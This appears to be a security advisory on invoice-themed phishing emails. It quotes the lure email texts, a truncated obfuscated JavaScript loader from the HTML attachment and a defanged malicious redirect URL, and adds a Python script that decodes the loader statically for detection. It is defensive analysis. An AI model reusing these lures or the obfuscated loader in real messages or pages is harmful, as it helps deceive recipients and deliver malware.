Obfuscated javascript appears in emails with attached HTML invoices


MX Lab, http://www.mxlab.eu, has started to intercept a new email-borne security risk. The email in question carries an attached HTML file, presented as an intercompany invoice, that in fact redirects the reader to a hosted web page containing obfuscated JavaScript.

The email is sent from a spoofed address and uses one of the following bodies:

Hallo

Attached the inter-company inv. for the period July 2012 til Aug. 2012.(Internet Explorer file)

Thanks you

JENE Pickett
Boyd Gaming Corp.

Good day

Attached the intercompany inv. for the period July 2012 til Aug. 2012.(Internet Explorer file)
Thanks a lot for support setting up this process.
CASSY LOFTON
AMR Corporation Corp.

Hi

Attached the intercompany inv. for the period July 2012 til Aug. 2012.(Internet Explorer file)

Thanks a lot

Karlie Sanford
WLC Corp.

The attached HTML file is named Invoice_PA****.htm, where each * stands for a digit.

The HTML code:

———————————————

Please wait

Please wait… You will be forwarded…

Internet Explorer / Mozilla Firefox compatible only

dbshre=170;try{window.document.body/=2}catch(gdsgsdg){if(dbshre)
{zaq=0;try{v=document.createElement("div");}catch(agdsg){zaq=1;}if(!zaq)
{e=eval;}ss=String;asgq=new Array(109,89,107,43,56,43,49,52,4,___CUT____
,116);s="";for(i=0;i-106!=0;i++){if(window.document)s+=ss["fro"+"mCha"+"rCo"+"de"]
(1*asgq[i]-(i%5-5-3-1));}
z=s;e(s);}}

———————————————

This HTML forwards the reader to hxxp://esigbsoahd.ru:8080/forum/links/column.php, where the obfuscated JavaScript is hosted.
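The script above only needs two things to reveal its payload: the numeric array and the per-index arithmetic inside fromCharCode. As an added example (not code from the original post or from MX Lab), the Python below mirrors that arithmetic statically, so an analyst can recover the string handed to eval without ever executing the attachment and without satisfying its DOM checks; the embedded sample is constructed from the nine char codes visible above (the real array has 106 entries and is cut in the post), and the regexes and function names are my own assumptions about the file's layout.

```python
import re

# Constructed sample: the try/catch shell from the intercepted file with only the
# nine char codes that are visible on the page (the real array has 106 entries).
SAMPLE_HTML = """<script>
dbshre=170;try{window.document.body/=2}catch(gdsgsdg){if(dbshre)
{zaq=0;try{v=document.createElement("div");}catch(agdsg){zaq=1;}if(!zaq)
{e=eval;}ss=String;asgq=new Array(109,89,107,43,56,43,49,52,4);s="";
for(i=0;i-106!=0;i++){if(window.document)s+=ss["fro"+"mCha"+"rCo"+"de"]
(1*asgq[i]-(i%5-5-3-1));}z=s;e(s);}}
</script>"""

ARRAY_RE = re.compile(r"new Array\(([\d,\s]+)\)")
# Bracket access built from concatenated string literals, e.g. ss["fro"+"mCha"+...]
SPLIT_NAME_RE = re.compile(r'\[((?:\s*"[^"]*"\s*\+)+\s*"[^"]*"\s*)\]')

def extract_codes(html):
    """Pull the numeric array out of the script without evaluating anything."""
    m = ARRAY_RE.search(html)
    if not m:
        raise ValueError("no 'new Array(...)' literal found")
    return [int(x) for x in m.group(1).split(",") if x.strip()]

def decode(codes):
    """Mirror fromCharCode(1*asgq[i]-(i%5-5-3-1)), i.e. add 9-(i%5) to each code."""
    return "".join(chr(c - (i % 5 - 9)) for i, c in enumerate(codes))

def deobfuscate(html):
    """Return the string the script would hand to eval, never running it."""
    return decode(extract_codes(html))

def hidden_method_names(html):
    """Rejoin method names split into concatenated literals, a common obfuscation tell."""
    return ["".join(re.findall(r'"([^"]*)"', m)) for m in SPLIT_NAME_RE.findall(html)]

if __name__ == "__main__":
    print(repr(deobfuscate(SAMPLE_HTML)))   # 'var1=49;\n'
    print(hidden_method_names(SAMPLE_HTML))  # ['fromCharCode']
```

The nine visible codes decode to the start of a second-stage script (a variable assignment), which confirms the key arithmetic before the full array is fed in; the split-literal check is a cheap signal for mail gateway rules against this family of attachments.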

A quick Google search shows that this is in fact a known security risk in an old format from 2011 that has somehow been reactivated; the invoice period quoted in the email also refers to July to August 2012.

MX Lab recommends not opening the attached HTML document in any way, nor following the redirect.